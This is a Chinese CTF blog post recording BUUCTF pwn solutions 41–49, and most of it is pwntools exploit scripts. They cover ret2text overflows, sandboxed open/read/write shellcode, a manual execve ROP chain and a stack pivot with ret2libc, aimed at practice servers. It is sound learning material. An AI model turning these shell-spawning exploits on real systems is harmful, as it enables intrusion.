<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"maple-pwn.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.23.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="buu刷题记录（41-60题）by Maple 41 picoctf_2018_buffer overflow 1ret2text 12345678910111213141516from pwn import *from LibcSearcher import LibcSearcherfrom ctypes import *context(os&#x3D;&#x27;linux&#x27;, arch&#x3D;&amp;#">
<meta property="og:type" content="article">
<meta property="og:title" content="Maple">
<meta property="og:url" content="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89/index.html">
<meta property="og:site_name" content="Maple">
<meta property="og:description" content="buu刷题记录（41-60题）by Maple 41 picoctf_2018_buffer overflow 1ret2text 12345678910111213141516from pwn import *from LibcSearcher import LibcSearcherfrom ctypes import *context(os&#x3D;&#x27;linux&#x27;, arch&#x3D;&amp;#">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://maple-pwn.github.io/polarD&N/images/image-20250204214033910.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250206135324577.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250210000514934.png">
<meta property="og:image" content="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89/images/image-20250216001902396.png">
<meta property="og:image" content="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89/images/image-20250216002126070.png">
<meta property="og:image" content="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89/images/image-20250216002324164.png">
<meta property="og:image" content="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89/images/image-20250216002503305.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250216163343339.png">
<meta property="article:published_time" content="2025-04-03T17:34:36.802Z">
<meta property="article:modified_time" content="2025-03-01T15:21:10.047Z">
<meta property="article:author" content="Maple">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://maple-pwn.github.io/polarD&N/images/image-20250204214033910.png">


<link rel="canonical" href="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89/","path":"2025/04/04/buuctf/buuctf刷题记录（41-60题）/","title":""}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title> | Maple</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Maple</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Maple’s Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89"><span class="nav-number">1.</span> <span class="nav-text">buu刷题记录（41-60题）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#41-picoctf-2018-buffer-overflow-1"><span class="nav-number">1.1.</span> <span class="nav-text">41 picoctf_2018_buffer overflow 1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#42-jarvisoj-test-your-memory"><span class="nav-number">1.2.</span> <span class="nav-text">42 jarvisoj_test_your_memory</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#43-ZJCTF-2019-EasyHeap"><span class="nav-number">1.3.</span> <span class="nav-text">43 [ZJCTF 2019]EasyHeap</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#44-hitcontraining-uaf"><span class="nav-number">1.4.</span> <span class="nav-text">44 hitcontraining_uaf</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#45-pwnable-orw"><span class="nav-number">1.5.</span> <span class="nav-text">45 pwnable_orw</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#46-picoctf-2018-buffer-overflow-2"><span class="nav-number">1.6.</span> <span class="nav-text">46 picoctf_2018_buffer overflow 2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#47-cmcc-simplerop"><span class="nav-number">1.7.</span> <span class="nav-text">47 cmcc_simplerop</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90"><span class="nav-number">1.7.1.</span> <span class="nav-text">分析分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#48-Black-Watch-%E5%85%A5%E7%BE%A4%E9%A2%98-PWN"><span class="nav-number">1.8.</span> <span class="nav-text">48 [Black Watch 入群题]PWN</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#49-wustctf2020-getshell-2"><span class="nav-number">1.9.</span> <span class="nav-text">49 wustctf2020_getshell_2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#50-mrctf2020-easyoverflow"><span class="nav-number">1.10.</span> <span class="nav-text">50 mrctf2020_easyoverflow</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#51-bbys-tu-2016"><span class="nav-number">1.11.</span> <span class="nav-text">51 bbys_tu_2016</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#52-xdctf2015-pwn200"><span class="nav-number">1.12.</span> <span class="nav-text">52 xdctf2015_pwn200</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#53-wustctf2020-closed"><span class="nav-number">1.13.</span> <span class="nav-text">53 wustctf2020_closed</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A0%87%E5%87%86%E6%96%87%E4%BB%B6%E6%8F%8F%E8%BF%B0%E7%AC%A6"><span class="nav-number">1.13.1.</span> <span class="nav-text">标准文件描述符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%87%8D%E5%AE%9A%E5%90%91"><span class="nav-number">1.13.2.</span> <span class="nav-text">重定向</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#54-ciscn-2019-s-4"><span class="nav-number">1.14.</span> <span class="nav-text">54 ciscn_2019_s_4</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90"><span class="nav-number">1.14.1.</span> <span class="nav-text">动态调试分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#55-ZJCTF-2019-Login"><span class="nav-number">1.15.</span> <span class="nav-text">55 [ZJCTF 2019]Login</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#56-picoctf-2018-shellcode"><span class="nav-number">1.16.</span> <span class="nav-text">56 picoctf_2018_shellcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#57-hitcontraining-magicheap"><span class="nav-number">1.17.</span> <span class="nav-text">57 hitcontraining_magicheap</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#58-jarviso-level1"><span class="nav-number">1.18.</span> <span class="nav-text">58 jarviso_level1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#59-axb-2019-fmt32"><span class="nav-number">1.19.</span> <span class="nav-text">59 axb 2019 fmt32</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%9E%90"><span class="nav-number">1.19.1.</span> <span class="nav-text">分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#60-cinscn-s-9"><span class="nav-number">1.20.</span> <span class="nav-text">60 cinscn_s_9</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Maple</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Maple">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Maple">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content=" | Maple">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-04-04 01:34:36" itemprop="dateCreated datePublished" datetime="2025-04-04T01:34:36+08:00">2025-04-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-03-01 23:21:10" itemprop="dateModified" datetime="2025-03-01T23:21:10+08:00">2025-03-01</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="buu刷题记录（41-60题）"><a href="#buu刷题记录（41-60题）" class="headerlink" title="buu刷题记录（41-60题）"></a>buu刷题记录（41-60题）</h1><p>by Maple</p>
<h2 id="41-picoctf-2018-buffer-overflow-1"><a href="#41-picoctf-2018-buffer-overflow-1" class="headerlink" title="41 picoctf_2018_buffer overflow 1"></a>41 picoctf_2018_buffer overflow 1</h2><p><em><strong>ret2text</strong></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">29931</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x28</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(<span class="number">0x80485CB</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="42-jarvisoj-test-your-memory"><a href="#42-jarvisoj-test-your-memory" class="headerlink" title="42 jarvisoj_test_your_memory"></a>42 jarvisoj_test_your_memory</h2><p><em><strong>ret2text</strong></em></p>
<p>别看题上那些有的没的，有个溢出点，有个<code>system</code>,还有<code>cat flag</code>字符串，直接构造rop</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">27254</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">sys = <span class="number">0x80485C9</span></span><br><span class="line">flag_addr = <span class="number">0x80487E0</span></span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x13</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(sys)+p32(flag_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="43-ZJCTF-2019-EasyHeap"><a href="#43-ZJCTF-2019-EasyHeap" class="headerlink" title="43 [ZJCTF 2019]EasyHeap"></a>43 [ZJCTF 2019]EasyHeap</h2><p>施工中</p>
<h2 id="44-hitcontraining-uaf"><a href="#44-hitcontraining-uaf" class="headerlink" title="44 hitcontraining_uaf"></a>44 hitcontraining_uaf</h2><p>施工中</p>
<h2 id="45-pwnable-orw"><a href="#45-pwnable-orw" class="headerlink" title="45 pwnable_orw"></a>45 pwnable_orw</h2><p><em><strong>沙箱</strong></em></p>
<p>就是ban了一些危险的函数，但是以获得flag为目的的话也不需要非得getshell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(arch=<span class="string">&#x27;i386&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">26440</span>)</span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line"></span><br><span class="line">bss = <span class="number">0x804A060</span></span><br><span class="line">shellcode = shellcraft.<span class="built_in">open</span>(<span class="string">&#x27;flag&#x27;</span>)</span><br><span class="line">shellcode+=shellcraft.read(<span class="string">&#x27;eax&#x27;</span>,bss+<span class="number">100</span>,<span class="number">100</span>)</span><br><span class="line">shellcode+=shellcraft.write(<span class="number">1</span>,bss+<span class="number">100</span>,<span class="number">100</span>)</span><br><span class="line">payload = asm(shellcode)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;shellcode:&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="comment">#log.info(p.recv())</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="46-picoctf-2018-buffer-overflow-2"><a href="#46-picoctf-2018-buffer-overflow-2" class="headerlink" title="46 picoctf_2018_buffer overflow 2"></a>46 picoctf_2018_buffer overflow 2</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;i386&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">28047</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x6c</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(<span class="number">0x080485CB</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0xDEADBEEF</span>)+p32(<span class="number">0xDEADC0DE</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="47-cmcc-simplerop"><a href="#47-cmcc-simplerop" class="headerlink" title="47 cmcc_simplerop"></a>47 cmcc_simplerop</h2><p><em><strong>rop</strong></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">29845</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">read_addr = elf.sym[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">pop_edx_ecx_ebx = <span class="number">0x0806e850</span></span><br><span class="line">binsh = <span class="number">0x80EB584</span></span><br><span class="line">int_addr = <span class="number">0x80493e1</span>	<span class="comment"># int 0x80</span></span><br><span class="line">pop_eax = <span class="number">0x80bae06</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x20</span>+p32(read_addr)+p32(<span class="number">0xdeadbeef</span>)+p32(<span class="number">0</span>)+p32(binsh)+p32(<span class="number">0x8</span>)</span><br><span class="line">payload+=p32(pop_eax)+p32(<span class="number">0xb</span>)+p32(pop_edx_ecx_ebx)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(binsh)+p32(int_addr)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.send(<span class="string">&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="分析分析"><a href="#分析分析" class="headerlink" title="分析分析"></a>分析分析</h3><p>这种纯手工构造ROP还是可以分析分析的</p>
<ul>
<li><p>首先是系统调用的知识，可以看<a target="_blank" rel="noopener" href="https://blog.csdn.net/xiaominthere/article/details/17287965">这里</a></p>
<ul>
<li>省流一下：<code>int 0x80</code>就是系统调用（syscall），然后根据<code>syscall(n)</code>中n的值执行不同函数，其中<code>0xb</code>可以执行<code>execve</code>函数</li>
</ul>
</li>
<li><p>接下来构造ROP</p>
<ul>
<li><p>先是溢出覆盖，这里ida显示的不对，动态调试可以发现实际的偏移是0x1c</p>
<p><img src="/./../polarD&N/images/image-20250204214033910.png" alt="image-20250204214033910"></p>
<blockquote>
<p>我们输入的相对位置是0x24,ebp的相对位置是0x40，实际偏移<code>0x40-0x24=0x1c</code></p>
</blockquote>
</li>
<li><p>因为程序中没有<code>/bin/sh</code>函数，所以我们需要调用一下<code>read</code>函数，以此输入一个<code>/bin/sh</code>进去（这里binsh的地址是bss段，因为没开PIE，所以地址所见即所得）</p>
</li>
<li><p>接下来第二行就是进行系统调用了，我们要申请的函数是</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="number">0x80</span>(<span class="number">0xb</span>,’/bin/sh‘, null, null);</span><br><span class="line"><span class="comment">//对应寄存器eax, ebx,	 ecx,  edx</span></span><br></pre></td></tr></table></figure>

<p>这四个寄存器地址也确实可以搜到，所以根据寄存器依次输入需要的数就好</p>
</li>
</ul>
</li>
</ul>
<h2 id="48-Black-Watch-入群题-PWN"><a href="#48-Black-Watch-入群题-PWN" class="headerlink" title="48 [Black Watch 入群题]PWN"></a>48 [Black Watch 入群题]PWN</h2><p><em><strong>栈迁移+ret2libc</strong></em></p>
<p>因为没有RWX段，所以不可以写入shellcode然后栈迁移执行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&quot;node5.buuoj.cn&quot;</span>, <span class="number">25707</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc-2.23.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line">main_addr = <span class="number">0x8048513</span></span><br><span class="line">lea_ret_addr = <span class="number">0x8048511</span></span><br><span class="line">plt_write = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">got_write = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">bss_s_addr = <span class="number">0x804A300</span></span><br><span class="line"></span><br><span class="line">payload1 = <span class="string">b&#x27;a&#x27;</span> * <span class="number">4</span> + p32(plt_write) + p32(main_addr) + p32(<span class="number">1</span>) + p32(got_write) + p32(<span class="number">4</span>)</span><br><span class="line">p.sendafter(<span class="string">&quot;name?&quot;</span>, payload1)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span> * <span class="number">0x18</span> + p32(bss_s_addr) + p32(lea_ret_addr)</span><br><span class="line">p.sendafter(<span class="string">&quot;say?&quot;</span>, payload2)</span><br><span class="line">write_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">offset = write_addr - libc.symbols[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">binsh = offset + libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>).__next__()</span><br><span class="line">system = offset + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload3 = <span class="string">b&#x27;aaaa&#x27;</span> + p32(system) + <span class="string">b&#x27;aaaa&#x27;</span> + p32(binsh)</span><br><span class="line">p.sendafter(<span class="string">&quot;name?&quot;</span>, payload3)</span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">&quot;say?&quot;</span>, payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="49-wustctf2020-getshell-2"><a href="#49-wustctf2020-getshell-2" class="headerlink" title="49 wustctf2020_getshell_2"></a>49 wustctf2020_getshell_2</h2><p><em><strong>基础ROP</strong></em></p>
